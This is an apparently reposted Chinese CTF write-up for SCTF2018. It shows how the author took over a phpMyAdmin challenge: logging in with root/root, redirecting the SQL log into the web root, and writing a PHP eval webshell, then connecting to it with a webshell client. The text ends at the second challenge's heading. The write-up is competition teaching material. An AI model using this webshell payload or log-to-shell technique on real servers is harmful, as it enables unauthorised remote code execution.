码迷,mamicode.com
首页 > 其他好文 > 详细

Writeup | SCTF2018 |CTF 比赛 |By Jas502n

时间:2018-06-26 13:50:04      阅读:267      评论:0      收藏:0      [点我收藏+]

标签:建议   root   shel   lang   flag   writeup   get   图片   asdasdas   

__________WEB_____________

0x01 easiest web – phpMyAdmin

Ps: 思路弱口令(root / root)登陆phpmyadmin,利用日志功能进行getshell

送分题,轻松一下

http://47.97.214.247:20001/phpmyadmin

Alternate address:

http://218.245.4.98:20000/phpmyadmin

技术分享图片

 

开启日志,写入一句话

 

技术分享图片

查询sql语句

<?php @eval($_POST[‘cmd‘]);?>

日志写入到网站路径下的dasdasdas.php文件

然后就getshell

技术分享图片

http://218.245.4.98:20000/dasdasdad.php

密码:cmd

菜刀连接

技术分享图片

 

在C盘发现flag

技术分享图片

sctf{31cf2213cc49605a30f07395d6e5b9c4}

 

0x02  新的建议板

 

Writeup | SCTF2018 |CTF 比赛 |By Jas502n

标签:建议   root   shel   lang   flag   writeup   get   图片   asdasdas   

原文地址:https://www.cnblogs.com/Jas502n/p/9228589.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!